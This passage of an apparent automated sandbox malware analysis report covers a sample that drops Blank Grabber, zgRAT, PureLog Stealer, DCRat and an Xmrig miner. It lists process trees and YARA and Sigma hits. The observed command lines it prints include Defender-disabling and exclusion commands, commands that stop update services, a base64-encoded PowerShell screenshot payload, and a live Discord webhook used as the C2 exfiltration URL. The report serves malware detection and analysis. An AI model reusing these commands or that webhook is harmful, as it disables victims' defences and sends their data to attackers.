cmd.exe (PID: 1344 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 8164 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 7844 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

Conhost.exe (PID: 2504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 3636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6996 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

HpQPPZazcv.exe (PID: 7860 cmdline: C:\Recovery\HpQPPZazcv.exe MD5: 5FE249BBCC644C6F155D86E8B3CC1E12)

HpQPPZazcv.exe (PID: 7992 cmdline: C:\Recovery\HpQPPZazcv.exe MD5: 5FE249BBCC644C6F155D86E8B3CC1E12)

cmd.exe (PID: 7948 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 796 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 8180 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 8048 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 7540 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 7328 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: Blank Grabber

{"C2 url": "https://discord.com/api/webhooks/1264025291794157628/Sz1WQEp-Y2XqBUw8OiovYJ-HSmiCmR36z5iq2VLDwzDIXt2tsN2CAivzv3lJ-Ow3IUya"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Local\Temp\_MEI66642\rarreg.key	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
C:\Recovery\HpQPPZazcv.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Recovery\HpQPPZazcv.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files\Windows Defender\en-US\based.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files\Windows Defender\en-US\based.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\powershell.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Recovery\powershell.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\ProgramData\svchost.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\ProgramData\svchost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 10 entries

Memory Dumps

Source	Rule	Description	Author
00000002.00000003.1686411097.000001F919A15000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000003.1722014407.0000000005600000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000045.00000002.2932877358.00000000033D5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000045.00000002.2932877358.0000000003144000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000002.00000003.1686411097.000001F919A13000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000007.00000003.1702500179.00000000076F5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000E.00000003.1722722653.0000000004E00000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000045.00000002.2932877358.0000000003549000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001E.00000000.1761622309.00000000004B2000.00000002.00000001.01000000.00000023.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000001E.00000002.1949562045.00000000128C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: based.exe PID: 6664	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: based.exe PID: 6828	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: based.exe PID: 6828	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: based.exe PID: 6828	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author
14.3.svchost.exe.4e4e6ea.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
14.3.svchost.exe.4e4e6ea.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
30.0.ChainComServermonitor.exe.4b0000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
30.0.ChainComServermonitor.exe.4b0000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.3.svchost.exe.564e6ea.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
14.3.svchost.exe.564e6ea.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.3.svchost.exe.4e4e6ea.1.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
14.3.svchost.exe.4e4e6ea.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.3.svchost.exe.564e6ea.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
14.3.svchost.exe.564e6ea.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 5 entries

Sigma Signatures

Operating System Destruction

Sigma detected: Stop multiple services

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, ProcessId: 7948, ProcessName: cmd.exe

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe, ProcessId: 7008, TargetFilename: C:\ProgramData\svchost.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 6828, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", ProcessId: 6972, ProcessName: cmd.exe

Sigma detected: Powershell Defender Disable Scan Feature

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 6828, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 6976, ProcessName: cmd.exe

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\ProgramData\svchost.exe" , ParentImage: C:\ProgramData\svchost.exe, ParentProcessId: 3808, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , ProcessId: 7080, ProcessName: wscript.exe

Sigma detected: Suspicious Encoded PowerShell Command Line

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\ProgramData\svchost.exe" , ParentImage: C:\ProgramData\svchost.exe, ParentProcessId: 3808, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe" , ProcessId: 7080, ProcessName: wscript.exe

Sigma detected: Suspicious Startup Folder Persistence

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Microsoft\based.exe, ProcessId: 6828, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\ProgramData\svchost.exe" , CommandLine: "C:\ProgramData\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\svchost.exe, NewProcessName: C:\ProgramData\svchost.exe, OriginalFileName: C:\ProgramData\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe -pbeznogym, ParentImage: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe, ParentProcessId: 7008, ParentProcessName: s.exe, ProcessCommandLine: "C:\ProgramData\svchost.exe" , ProcessId: 3808, ProcessName: svchost.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

